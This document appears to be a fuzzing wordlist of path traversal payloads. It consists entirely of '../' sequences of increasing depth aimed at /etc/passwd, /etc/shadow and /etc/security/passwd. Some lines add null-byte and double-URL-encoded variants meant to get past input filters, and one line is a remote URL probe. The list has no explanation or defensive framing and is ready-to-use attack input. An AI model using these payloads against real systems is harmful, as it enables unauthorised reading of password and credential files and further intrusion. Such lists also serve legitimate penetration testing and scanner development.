http://www.google.com
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd%00
/%252e%252e%252fetc%252fpasswd
../%252e%252e%252fetc%252fpasswd
../../%252e%252e%252fetc%252fpasswd
../../../%252e%252e%252fetc%252fpasswd
../../../../%252e%252e%252fetc%252fpasswd
../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../../../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../../../../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../../../../../../../../../%252e%252e%252fetc%252fpasswd
../../../../../../../../../../../../../../../../%252e%252e%252fetc%252fpasswd
/%252e%252e%252fetc%252fpasswd%00
../%252e%252e%252fetc%252fpasswd%00
../%252e%252e%252fetc%252fpasswd%00
../../%252e%252e%252fetc%252fpasswd%00
../../../%252e%252e%252fetc%252fpasswd%00
../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../../../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../../../../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../../../../../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../../../../../../../../../%252e%252e%252fetc%252fpasswd%00
../../../../../../../../../../../../../../%252e%252e%252fetc%252fpasswd%00
/etc/shadow
../etc/shadow
../../etc/shadow
../../../etc/shadow
../../../../etc/shadow
../../../../../etc/shadow
../../../../../../etc/shadow
../../../../../../../etc/shadow
../../../../../../../../etc/shadow
../../../../../../../../../etc/shadow
../../../../../../../../../../etc/shadow
../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../../../etc/shadow
/etc/shadow%00
../etc/shadow%00
../../etc/shadow%00
../../../etc/shadow%00
../../../../etc/shadow%00
../../../../../etc/shadow%00
../../../../../../etc/shadow%00
../../../../../../../etc/shadow%00
../../../../../../../../etc/shadow%00
../../../../../../../../../etc/shadow%00
../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../../../../../../../etc/shadow%00
/etc/security/passwd
../etc/security/passwd
../../etc/security/passwd
../../../etc/security/passwd
../../../../etc/security/passwd
../../../../../etc/security/passwd
../../../../../../etc/security/passwd
../../../../../../../etc/security/passwd
../../../../../../../../etc/security/passwd
../../../../../../../../../etc/security/passwd
../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../../../../../etc/security/passwd
../../../../../../../../../../../../../../../../../../etc/security/passwd
/etc/security/passwd%00
../etc/security/passwd%00
../../etc/security/passwd%00
../../../etc/security/passwd%00
../../../../etc/security/passwd%00
../../../../../etc/security/passwd%00
../../../../../../etc/security/passwd%00
../../../../../../../etc/security/passwd%00
../../../../../../../../etc/security/passwd%00
../../../../../../../../../etc/security/passwd%00
../../../../../../../../../../etc/security/passwd%00
../../../../../../../../../../../etc/security/passwd%00
../../../../../../../../../../../../etc/security/passwd%00
../../../../../../../../../../../../../etc/security/passwd%00
../../../../../../../../../../../../../../etc/security/passwd%00
../../../../../../../../../../../../../../../etc/security/passwd%00
../../../../../../../../../../../../../../../../etc/security/passwd%00
../../../../../../../../../../../../../../../../../etc/security/passwd%00
../../../../../../../../../../../../../../../../../../etc/security/passwd%00
